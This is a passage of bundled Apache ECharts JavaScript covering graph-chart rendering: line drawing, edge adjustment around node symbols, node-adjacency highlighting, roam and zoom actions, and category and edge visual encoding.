this.trigger('normal');\n};\n\nlineProto.updateLayout = function (lineData, idx) {\n    this.setLinePoints(lineData.getItemLayout(idx));\n};\n\nlineProto.setLinePoints = function (points) {\n    var linePath = this.childOfName('line');\n    setLinePoints(linePath.shape, points);\n    linePath.dirty();\n};\n\ninherits(Line$1, Group);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/chart/helper/LineDraw\n */\n\n// import IncrementalDisplayable from 'zrender/src/graphic/IncrementalDisplayable';\n\n/**\n * @alias module:echarts/component/marker/LineDraw\n * @constructor\n */\nfunction LineDraw(ctor) {\n    this._ctor = ctor || Line$1;\n\n    this.group = new Group();\n}\n\nvar lineDrawProto = LineDraw.prototype;\n\nlineDrawProto.isPersistent = function () {\n    return true;\n};\n\n/**\n * @param {module:echarts/data/List} lineData\n */\nlineDrawProto.updateData = function (lineData) {\n    var lineDraw = this;\n    var group = lineDraw.group;\n\n    var oldLineData = lineDraw._lineData;\n    lineDraw._lineData = lineData;\n\n    // There is no oldLineData only when first rendering or switching from\n    // stream mode to normal mode, where previous elements should be removed.\n    if (!oldLineData) {\n        group.removeAll();\n    }\n\n    var seriesScope = makeSeriesScope$1(lineData);\n\n    lineData.diff(oldLineData)\n        .add(function (idx) {\n            doAdd(lineDraw, lineData, idx, seriesScope);\n        })\n        .update(function (newIdx, oldIdx) {\n            doUpdate(lineDraw, oldLineData, lineData, oldIdx, newIdx, seriesScope);\n        })\n        .remove(function (idx) {\n            group.remove(oldLineData.getItemGraphicEl(idx));\n        })\n        .execute();\n};\n\nfunction doAdd(lineDraw, lineData, idx, seriesScope) {\n    var itemLayout = lineData.getItemLayout(idx);\n\n    if (!lineNeedsDraw(itemLayout)) {\n        return;\n    }\n\n    var el = new lineDraw._ctor(lineData, idx, seriesScope);\n    lineData.setItemGraphicEl(idx, el);\n    lineDraw.group.add(el);\n}\n\nfunction doUpdate(lineDraw, oldLineData, newLineData, oldIdx, newIdx, seriesScope) {\n    var itemEl = oldLineData.getItemGraphicEl(oldIdx);\n\n    if (!lineNeedsDraw(newLineData.getItemLayout(newIdx))) {\n        lineDraw.group.remove(itemEl);\n        return;\n    }\n\n    if (!itemEl) {\n        itemEl = new lineDraw._ctor(newLineData, newIdx, seriesScope);\n    }\n    else {\n        itemEl.updateData(newLineData, newIdx, seriesScope);\n    }\n\n    newLineData.setItemGraphicEl(newIdx, itemEl);\n\n    lineDraw.group.add(itemEl);\n}\n\nlineDrawProto.updateLayout = function () {\n    var lineData = this._lineData;\n\n    // Do not support update layout in incremental mode.\n    if (!lineData) {\n        return;\n    }\n\n    lineData.eachItemGraphicEl(function (el, idx) {\n        el.updateLayout(lineData, idx);\n    }, this);\n};\n\nlineDrawProto.incrementalPrepareUpdate = function (lineData) {\n    this._seriesScope = makeSeriesScope$1(lineData);\n    this._lineData = null;\n    this.group.removeAll();\n};\n\nlineDrawProto.incrementalUpdate = function (taskParams, lineData) {\n    function updateIncrementalAndHover(el) {\n        if (!el.isGroup) {\n            el.incremental = el.useHoverLayer = true;\n        }\n    }\n\n    for (var idx = taskParams.start; idx < taskParams.end; idx++) {\n        var itemLayout = lineData.getItemLayout(idx);\n\n        if (lineNeedsDraw(itemLayout)) {\n            var el = new this._ctor(lineData, idx, this._seriesScope);\n            el.traverse(updateIncrementalAndHover);\n\n            this.group.add(el);\n            lineData.setItemGraphicEl(idx, el);\n        }\n    }\n};\n\nfunction makeSeriesScope$1(lineData) {\n    var hostModel = lineData.hostModel;\n    return {\n        lineStyle: hostModel.getModel('lineStyle').getLineStyle(),\n        hoverLineStyle: hostModel.getModel('emphasis.lineStyle').getLineStyle(),\n        labelModel: hostModel.getModel('label'),\n        hoverLabelModel: hostModel.getModel('emphasis.label')\n    };\n}\n\nlineDrawProto.remove = function () {\n    this._clearIncremental();\n    this._incremental = null;\n    this.group.removeAll();\n};\n\nlineDrawProto._clearIncremental = function () {\n    var incremental = this._incremental;\n    if (incremental) {\n        incremental.clearDisplaybles();\n    }\n};\n\nfunction isPointNaN(pt) {\n    return isNaN(pt[0]) || isNaN(pt[1]);\n}\n\nfunction lineNeedsDraw(pts) {\n    return !isPointNaN(pts[0]) && !isPointNaN(pts[1]);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction getNodeGlobalScale(seriesModel) {\n    var coordSys = seriesModel.coordinateSystem;\n    if (coordSys.type !== 'view') {\n        return 1;\n    }\n\n    var nodeScaleRatio = seriesModel.option.nodeScaleRatio;\n\n    var groupScale = coordSys.scale;\n    var groupZoom = (groupScale && groupScale[0]) || 1;\n    // Scale node when zoom changes\n    var roamZoom = coordSys.getZoom();\n    var nodeScale = (roamZoom - 1) * nodeScaleRatio + 1;\n\n    return nodeScale / groupZoom;\n}\n\nfunction getSymbolSize$1(node) {\n    var symbolSize = node.getVisual('symbolSize');\n    if (symbolSize instanceof Array) {\n        symbolSize = (symbolSize[0] + symbolSize[1]) / 2;\n    }\n    return +symbolSize;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar v1 = [];\nvar v2 = [];\nvar v3 = [];\nvar quadraticAt$1 = quadraticAt;\nvar v2DistSquare = distSquare;\nvar mathAbs$1 = Math.abs;\nfunction intersectCurveCircle(curvePoints, center, radius) {\n    var p0 = curvePoints[0];\n    var p1 = curvePoints[1];\n    var p2 = curvePoints[2];\n\n    var d = Infinity;\n    var t;\n    var radiusSquare = radius * radius;\n    var interval = 0.1;\n\n    for (var _t = 0.1; _t <= 0.9; _t += 0.1) {\n        v1[0] = quadraticAt$1(p0[0], p1[0], p2[0], _t);\n        v1[1] = quadraticAt$1(p0[1], p1[1], p2[1], _t);\n        var diff = mathAbs$1(v2DistSquare(v1, center) - radiusSquare);\n        if (diff < d) {\n            d = diff;\n            t = _t;\n        }\n    }\n\n    // Assume the segment is monotone，Find root through Bisection method\n    // At most 32 iteration\n    for (var i = 0; i < 32; i++) {\n        // var prev = t - interval;\n        var next = t + interval;\n        // v1[0] = quadraticAt(p0[0], p1[0], p2[0], prev);\n        // v1[1] = quadraticAt(p0[1], p1[1], p2[1], prev);\n        v2[0] = quadraticAt$1(p0[0], p1[0], p2[0], t);\n        v2[1] = quadraticAt$1(p0[1], p1[1], p2[1], t);\n        v3[0] = quadraticAt$1(p0[0], p1[0], p2[0], next);\n        v3[1] = quadraticAt$1(p0[1], p1[1], p2[1], next);\n\n        var diff = v2DistSquare(v2, center) - radiusSquare;\n        if (mathAbs$1(diff) < 1e-2) {\n            break;\n        }\n\n        // var prevDiff = v2DistSquare(v1, center) - radiusSquare;\n        var nextDiff = v2DistSquare(v3, center) - radiusSquare;\n\n        interval /= 2;\n        if (diff < 0) {\n            if (nextDiff >= 0) {\n                t = t + interval;\n            }\n            else {\n                t = t - interval;\n            }\n        }\n        else {\n            if (nextDiff >= 0) {\n                t = t - interval;\n            }\n            else {\n                t = t + interval;\n            }\n        }\n    }\n\n    return t;\n}\n\n// Adjust edge to avoid\nvar adjustEdge = function (graph, scale$$1) {\n    var tmp0 = [];\n    var quadraticSubdivide$$1 = quadraticSubdivide;\n    var pts = [[], [], []];\n    var pts2 = [[], []];\n    var v = [];\n    scale$$1 /= 2;\n\n    graph.eachEdge(function (edge, idx) {\n        var linePoints = edge.getLayout();\n        var fromSymbol = edge.getVisual('fromSymbol');\n        var toSymbol = edge.getVisual('toSymbol');\n\n        if (!linePoints.__original) {\n            linePoints.__original = [\n                clone$1(linePoints[0]),\n                clone$1(linePoints[1])\n            ];\n            if (linePoints[2]) {\n                linePoints.__original.push(clone$1(linePoints[2]));\n            }\n        }\n        var originalPoints = linePoints.__original;\n        // Quadratic curve\n        if (linePoints[2] != null) {\n            copy(pts[0], originalPoints[0]);\n            copy(pts[1], originalPoints[2]);\n            copy(pts[2], originalPoints[1]);\n            if (fromSymbol && fromSymbol !== 'none') {\n                var symbolSize = getSymbolSize$1(edge.node1);\n\n                var t = intersectCurveCircle(pts, originalPoints[0], symbolSize * scale$$1);\n                // Subdivide and get the second\n                quadraticSubdivide$$1(pts[0][0], pts[1][0], pts[2][0], t, tmp0);\n                pts[0][0] = tmp0[3];\n                pts[1][0] = tmp0[4];\n                quadraticSubdivide$$1(pts[0][1], pts[1][1], pts[2][1], t, tmp0);\n                pts[0][1] = tmp0[3];\n                pts[1][1] = tmp0[4];\n            }\n            if (toSymbol && toSymbol !== 'none') {\n                var symbolSize = getSymbolSize$1(edge.node2);\n\n                var t = intersectCurveCircle(pts, originalPoints[1], symbolSize * scale$$1);\n                // Subdivide and get the first\n                quadraticSubdivide$$1(pts[0][0], pts[1][0], pts[2][0], t, tmp0);\n                pts[1][0] = tmp0[1];\n                pts[2][0] = tmp0[2];\n                quadraticSubdivide$$1(pts[0][1], pts[1][1], pts[2][1], t, tmp0);\n                pts[1][1] = tmp0[1];\n                pts[2][1] = tmp0[2];\n            }\n            // Copy back to layout\n            copy(linePoints[0], pts[0]);\n            copy(linePoints[1], pts[2]);\n            copy(linePoints[2], pts[1]);\n        }\n        // Line\n        else {\n            copy(pts2[0], originalPoints[0]);\n            copy(pts2[1], originalPoints[1]);\n\n            sub(v, pts2[1], pts2[0]);\n            normalize(v, v);\n            if (fromSymbol && fromSymbol !== 'none') {\n\n                var symbolSize = getSymbolSize$1(edge.node1);\n\n                scaleAndAdd(pts2[0], pts2[0], v, symbolSize * scale$$1);\n            }\n            if (toSymbol && toSymbol !== 'none') {\n                var symbolSize = getSymbolSize$1(edge.node2);\n\n                scaleAndAdd(pts2[1], pts2[1], v, -symbolSize * scale$$1);\n            }\n            copy(linePoints[0], pts2[0]);\n            copy(linePoints[1], pts2[1]);\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar FOCUS_ADJACENCY = '__focusNodeAdjacency';\nvar UNFOCUS_ADJACENCY = '__unfocusNodeAdjacency';\n\nvar nodeOpacityPath = ['itemStyle', 'opacity'];\nvar lineOpacityPath = ['lineStyle', 'opacity'];\n\nfunction getItemOpacity(item, opacityPath) {\n    var opacity = item.getVisual('opacity');\n    return opacity != null ? opacity : item.getModel().get(opacityPath);\n}\n\nfunction fadeOutItem(item, opacityPath, opacityRatio) {\n    var el = item.getGraphicEl();\n    var opacity = getItemOpacity(item, opacityPath);\n\n    if (opacityRatio != null) {\n        opacity == null && (opacity = 1);\n        opacity *= opacityRatio;\n    }\n\n    el.downplay && el.downplay();\n    el.traverse(function (child) {\n        if (!child.isGroup) {\n            var opct = child.lineLabelOriginalOpacity;\n            if (opct == null || opacityRatio != null) {\n                opct = opacity;\n            }\n            child.setStyle('opacity', opct);\n        }\n    });\n}\n\nfunction fadeInItem(item, opacityPath) {\n    var opacity = getItemOpacity(item, opacityPath);\n    var el = item.getGraphicEl();\n    // Should go back to normal opacity first, consider hoverLayer,\n    // where current state is copied to elMirror, and support\n    // emphasis opacity here.\n    el.traverse(function (child) {\n        !child.isGroup && child.setStyle('opacity', opacity);\n    });\n    el.highlight && el.highlight();\n}\n\nextendChartView({\n\n    type: 'graph',\n\n    init: function (ecModel, api) {\n        var symbolDraw = new SymbolDraw();\n        var lineDraw = new LineDraw();\n        var group = this.group;\n\n        this._controller = new RoamController(api.getZr());\n        this._controllerHost = {target: group};\n\n        group.add(symbolDraw.group);\n        group.add(lineDraw.group);\n\n        this._symbolDraw = symbolDraw;\n        this._lineDraw = lineDraw;\n\n        this._firstRender = true;\n    },\n\n    render: function (seriesModel, ecModel, api) {\n        var graphView = this;\n        var coordSys = seriesModel.coordinateSystem;\n\n        this._model = seriesModel;\n\n        var symbolDraw = this._symbolDraw;\n        var lineDraw = this._lineDraw;\n\n        var group = this.group;\n\n        if (coordSys.type === 'view') {\n            var groupNewProp = {\n                position: coordSys.position,\n                scale: coordSys.scale\n            };\n            if (this._firstRender) {\n                group.attr(groupNewProp);\n            }\n            else {\n                updateProps(group, groupNewProp, seriesModel);\n            }\n        }\n        // Fix edge contact point with node\n        adjustEdge(seriesModel.getGraph(), getNodeGlobalScale(seriesModel));\n\n        var data = seriesModel.getData();\n        symbolDraw.updateData(data);\n\n        var edgeData = seriesModel.getEdgeData();\n        lineDraw.updateData(edgeData);\n\n        this._updateNodeAndLinkScale();\n\n        this._updateController(seriesModel, ecModel, api);\n\n        clearTimeout(this._layoutTimeout);\n        var forceLayout = seriesModel.forceLayout;\n        var layoutAnimation = seriesModel.get('force.layoutAnimation');\n        if (forceLayout) {\n            this._startForceLayoutIteration(forceLayout, layoutAnimation);\n        }\n\n        data.eachItemGraphicEl(function (el, idx) {\n            var itemModel = data.getItemModel(idx);\n            // Update draggable\n            el.off('drag').off('dragend');\n            var draggable = itemModel.get('draggable');\n            if (draggable) {\n                el.on('drag', function () {\n                    if (forceLayout) {\n                        forceLayout.warmUp();\n                        !this._layouting\n                            && this._startForceLayoutIteration(forceLayout, layoutAnimation);\n                        forceLayout.setFixed(idx);\n                        // Write position back to layout\n                        data.setItemLayout(idx, el.position);\n                    }\n                }, this).on('dragend', function () {\n                    if (forceLayout) {\n                        forceLayout.setUnfixed(idx);\n                    }\n                }, this);\n            }\n            el.setDraggable(draggable && forceLayout);\n\n            el[FOCUS_ADJACENCY] && el.off('mouseover', el[FOCUS_ADJACENCY]);\n            el[UNFOCUS_ADJACENCY] && el.off('mouseout', el[UNFOCUS_ADJACENCY]);\n\n            if (itemModel.get('focusNodeAdjacency')) {\n                el.on('mouseover', el[FOCUS_ADJACENCY] = function () {\n                    graphView._clearTimer();\n                    api.dispatchAction({\n                        type: 'focusNodeAdjacency',\n                        seriesId: seriesModel.id,\n                        dataIndex: el.dataIndex\n                    });\n                });\n                el.on('mouseout', el[UNFOCUS_ADJACENCY] = function () {\n                    graphView._dispatchUnfocus(api);\n                });\n            }\n\n        }, this);\n\n        data.graph.eachEdge(function (edge) {\n            var el = edge.getGraphicEl();\n\n            el[FOCUS_ADJACENCY] && el.off('mouseover', el[FOCUS_ADJACENCY]);\n            el[UNFOCUS_ADJACENCY] && el.off('mouseout', el[UNFOCUS_ADJACENCY]);\n\n            if (edge.getModel().get('focusNodeAdjacency')) {\n                el.on('mouseover', el[FOCUS_ADJACENCY] = function () {\n                    graphView._clearTimer();\n                    api.dispatchAction({\n                        type: 'focusNodeAdjacency',\n                        seriesId: seriesModel.id,\n                        edgeDataIndex: edge.dataIndex\n                    });\n                });\n                el.on('mouseout', el[UNFOCUS_ADJACENCY] = function () {\n                    graphView._dispatchUnfocus(api);\n                });\n            }\n        });\n\n        var circularRotateLabel = seriesModel.get('layout') === 'circular'\n            && seriesModel.get('circular.rotateLabel');\n        var cx = data.getLayout('cx');\n        var cy = data.getLayout('cy');\n        data.eachItemGraphicEl(function (el, idx) {\n            var itemModel = data.getItemModel(idx);\n            var labelRotate = itemModel.get('label.rotate') || 0;\n            var symbolPath = el.getSymbolPath();\n            if (circularRotateLabel) {\n                var pos = data.getItemLayout(idx);\n                var rad = Math.atan2(pos[1] - cy, pos[0] - cx);\n                if (rad < 0) {\n                    rad = Math.PI * 2 + rad;\n                }\n                var isLeft = pos[0] < cx;\n                if (isLeft) {\n                    rad = rad - Math.PI;\n                }\n                var textPosition = isLeft ? 'left' : 'right';\n                modifyLabelStyle(\n                    symbolPath,\n                    {\n                        textRotation: -rad,\n                        textPosition: textPosition,\n                        textOrigin: 'center'\n                    },\n                    {\n                        textPosition: textPosition\n                    }\n                );\n            }\n            else {\n                modifyLabelStyle(\n                    symbolPath,\n                    {\n                        textRotation: labelRotate *= Math.PI / 180\n                    }\n                );\n            }\n        });\n\n        this._firstRender = false;\n    },\n\n    dispose: function () {\n        this._controller && this._controller.dispose();\n        this._controllerHost = {};\n        this._clearTimer();\n    },\n\n    _dispatchUnfocus: function (api, opt) {\n        var self = this;\n        this._clearTimer();\n        this._unfocusDelayTimer = setTimeout(function () {\n            self._unfocusDelayTimer = null;\n            api.dispatchAction({\n                type: 'unfocusNodeAdjacency',\n                seriesId: self._model.id\n            });\n        }, 500);\n\n    },\n\n    _clearTimer: function () {\n        if (this._unfocusDelayTimer) {\n            clearTimeout(this._unfocusDelayTimer);\n            this._unfocusDelayTimer = null;\n        }\n    },\n\n    focusNodeAdjacency: function (seriesModel, ecModel, api, payload) {\n        var data = seriesModel.getData();\n        var graph = data.graph;\n        var dataIndex = payload.dataIndex;\n        var edgeDataIndex = payload.edgeDataIndex;\n\n        var node = graph.getNodeByIndex(dataIndex);\n        var edge = graph.getEdgeByIndex(edgeDataIndex);\n\n        if (!node && !edge) {\n            return;\n        }\n\n        graph.eachNode(function (node) {\n            fadeOutItem(node, nodeOpacityPath, 0.1);\n        });\n        graph.eachEdge(function (edge) {\n            fadeOutItem(edge, lineOpacityPath, 0.1);\n        });\n\n        if (node) {\n            fadeInItem(node, nodeOpacityPath);\n            each$1(node.edges, function (adjacentEdge) {\n                if (adjacentEdge.dataIndex < 0) {\n                    return;\n                }\n                fadeInItem(adjacentEdge, lineOpacityPath);\n                fadeInItem(adjacentEdge.node1, nodeOpacityPath);\n                fadeInItem(adjacentEdge.node2, nodeOpacityPath);\n            });\n        }\n        if (edge) {\n            fadeInItem(edge, lineOpacityPath);\n            fadeInItem(edge.node1, nodeOpacityPath);\n            fadeInItem(edge.node2, nodeOpacityPath);\n        }\n    },\n\n    unfocusNodeAdjacency: function (seriesModel, ecModel, api, payload) {\n        var graph = seriesModel.getData().graph;\n\n        graph.eachNode(function (node) {\n            fadeOutItem(node, nodeOpacityPath);\n        });\n        graph.eachEdge(function (edge) {\n            fadeOutItem(edge, lineOpacityPath);\n        });\n    },\n\n    _startForceLayoutIteration: function (forceLayout, layoutAnimation) {\n        var self = this;\n        (function step() {\n            forceLayout.step(function (stopped) {\n                self.updateLayout(self._model);\n                (self._layouting = !stopped) && (\n                    layoutAnimation\n                        ? (self._layoutTimeout = setTimeout(step, 16))\n                        : step()\n                );\n            });\n        })();\n    },\n\n    _updateController: function (seriesModel, ecModel, api) {\n        var controller = this._controller;\n        var controllerHost = this._controllerHost;\n        var group = this.group;\n\n        controller.setPointerChecker(function (e, x, y) {\n            var rect = group.getBoundingRect();\n            rect.applyTransform(group.transform);\n            return rect.contain(x, y)\n                && !onIrrelevantElement(e, api, seriesModel);\n        });\n\n        if (seriesModel.coordinateSystem.type !== 'view') {\n            controller.disable();\n            return;\n        }\n        controller.enable(seriesModel.get('roam'));\n        controllerHost.zoomLimit = seriesModel.get('scaleLimit');\n        controllerHost.zoom = seriesModel.coordinateSystem.getZoom();\n\n        controller\n            .off('pan')\n            .off('zoom')\n            .on('pan', function (e) {\n                updateViewOnPan(controllerHost, e.dx, e.dy);\n                api.dispatchAction({\n                    seriesId: seriesModel.id,\n                    type: 'graphRoam',\n                    dx: e.dx,\n                    dy: e.dy\n                });\n            })\n            .on('zoom', function (e) {\n                updateViewOnZoom(controllerHost, e.scale, e.originX, e.originY);\n                api.dispatchAction({\n                    seriesId: seriesModel.id,\n                    type: 'graphRoam',\n                    zoom: e.scale,\n                    originX: e.originX,\n                    originY: e.originY\n                });\n                this._updateNodeAndLinkScale();\n                adjustEdge(seriesModel.getGraph(), getNodeGlobalScale(seriesModel));\n                this._lineDraw.updateLayout();\n            }, this);\n    },\n\n    _updateNodeAndLinkScale: function () {\n        var seriesModel = this._model;\n        var data = seriesModel.getData();\n\n        var nodeScale = getNodeGlobalScale(seriesModel);\n        var invScale = [nodeScale, nodeScale];\n\n        data.eachItemGraphicEl(function (el, idx) {\n            el.attr('scale', invScale);\n        });\n    },\n\n    updateLayout: function (seriesModel) {\n        adjustEdge(seriesModel.getGraph(), getNodeGlobalScale(seriesModel));\n\n        this._symbolDraw.updateLayout();\n        this._lineDraw.updateLayout();\n    },\n\n    remove: function (ecModel, api) {\n        this._symbolDraw && this._symbolDraw.remove();\n        this._lineDraw && this._lineDraw.remove();\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @payload\n * @property {number} [seriesIndex]\n * @property {string} [seriesId]\n * @property {string} [seriesName]\n * @property {number} [dataIndex]\n */\nregisterAction({\n    type: 'focusNodeAdjacency',\n    event: 'focusNodeAdjacency',\n    update: 'series:focusNodeAdjacency'\n}, function () {});\n\n/**\n * @payload\n * @property {number} [seriesIndex]\n * @property {string} [seriesId]\n * @property {string} [seriesName]\n */\nregisterAction({\n    type: 'unfocusNodeAdjacency',\n    event: 'unfocusNodeAdjacency',\n    update: 'series:unfocusNodeAdjacency'\n}, function () {});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar actionInfo = {\n    type: 'graphRoam',\n    event: 'graphRoam',\n    update: 'none'\n};\n\n/**\n * @payload\n * @property {string} name Series name\n * @property {number} [dx]\n * @property {number} [dy]\n * @property {number} [zoom]\n * @property {number} [originX]\n * @property {number} [originY]\n */\nregisterAction(actionInfo, function (payload, ecModel) {\n    ecModel.eachComponent({mainType: 'series', query: payload}, function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n\n        var res = updateCenterAndZoom(coordSys, payload);\n\n        seriesModel.setCenter\n            && seriesModel.setCenter(res.center);\n\n        seriesModel.setZoom\n            && seriesModel.setZoom(res.zoom);\n    });\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar categoryFilter = function (ecModel) {\n    var legendModels = ecModel.findComponents({\n        mainType: 'legend'\n    });\n    if (!legendModels || !legendModels.length) {\n        return;\n    }\n    ecModel.eachSeriesByType('graph', function (graphSeries) {\n        var categoriesData = graphSeries.getCategoriesData();\n        var graph = graphSeries.getGraph();\n        var data = graph.data;\n\n        var categoryNames = categoriesData.mapArray(categoriesData.getName);\n\n        data.filterSelf(function (idx) {\n            var model = data.getItemModel(idx);\n            var category = model.getShallow('category');\n            if (category != null) {\n                if (typeof category === 'number') {\n                    category = categoryNames[category];\n                }\n                // If in any legend component the status is not selected.\n                for (var i = 0; i < legendModels.length; i++) {\n                    if (!legendModels[i].isSelected(category)) {\n                        return false;\n                    }\n                }\n            }\n            return true;\n        });\n    }, this);\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar categoryVisual = function (ecModel) {\n\n    var paletteScope = {};\n    ecModel.eachSeriesByType('graph', function (seriesModel) {\n        var categoriesData = seriesModel.getCategoriesData();\n        var data = seriesModel.getData();\n\n        var categoryNameIdxMap = {};\n\n        categoriesData.each(function (idx) {\n            var name = categoriesData.getName(idx);\n            // Add prefix to avoid conflict with Object.prototype.\n            categoryNameIdxMap['ec-' + name] = idx;\n            var itemModel = categoriesData.getItemModel(idx);\n\n            var color = itemModel.get('itemStyle.color')\n                || seriesModel.getColorFromPalette(name, paletteScope);\n            categoriesData.setItemVisual(idx, 'color', color);\n\n            var itemStyleList = ['opacity', 'symbol', 'symbolSize', 'symbolKeepAspect'];\n            for (var i = 0; i < itemStyleList.length; i++) {\n                var itemStyle = itemModel.getShallow(itemStyleList[i], true);\n                if (itemStyle != null) {\n                    categoriesData.setItemVisual(idx, itemStyleList[i], itemStyle);\n                }\n            }\n        });\n\n        // Assign category color to visual\n        if (categoriesData.count()) {\n            data.each(function (idx) {\n                var model = data.getItemModel(idx);\n                var category = model.getShallow('category');\n                if (category != null) {\n                    if (typeof category === 'string') {\n                        category = categoryNameIdxMap['ec-' + category];\n                    }\n\n                    var itemStyleList = ['color', 'opacity', 'symbol', 'symbolSize', 'symbolKeepAspect'];\n\n                    for (var i = 0; i < itemStyleList.length; i++) {\n                        if (data.getItemVisual(idx, itemStyleList[i], true) == null) {\n                            data.setItemVisual(\n                                idx, itemStyleList[i],\n                                categoriesData.getItemVisual(category, itemStyleList[i])\n                            );\n                        }\n                    }\n                }\n            });\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nfunction normalize$1(a) {\n    if (!(a instanceof Array)) {\n        a = [a, a];\n    }\n    return a;\n}\n\nvar edgeVisual = function (ecModel) {\n    ecModel.eachSeriesByType('graph', function (seriesModel) {\n        var graph = seriesModel.getGraph();\n        var edgeData = seriesModel.getEdgeData();\n        var symbolType = normalize$1(seriesModel.get('edgeSymbol'));\n        var symbolSize = normalize$1(seriesModel.get('edgeSymbolSize'));\n\n        var colorQuery = 'lineStyle.color'.split('.');\n        var opacityQuery = 'lineStyle.opacity'.split('.');\n\n        edgeData.setVisual('fromSymbol', symbolType && symbolType[0]);\n        edgeData.setVisual('toSymbol', symbolType && symbolType[1]);\n        edgeData.setVisual('fromSymbolSize', symbolSize && symbolSize[0]);\n        edgeData.setVisual('toSymbolSize', symbolSize && symbolSize[1]);\n        edgeData.setVisual('color', seriesModel.get(colorQuery));\n        edgeData.setVisual('opacity', seriesModel.get(opacityQuery));\n\n        edgeData.each(function (idx) {\n            var itemModel = edgeData.getItemModel(idx);\n            var edge = graph.getEdgeByIndex(idx);\n            var symbolType = 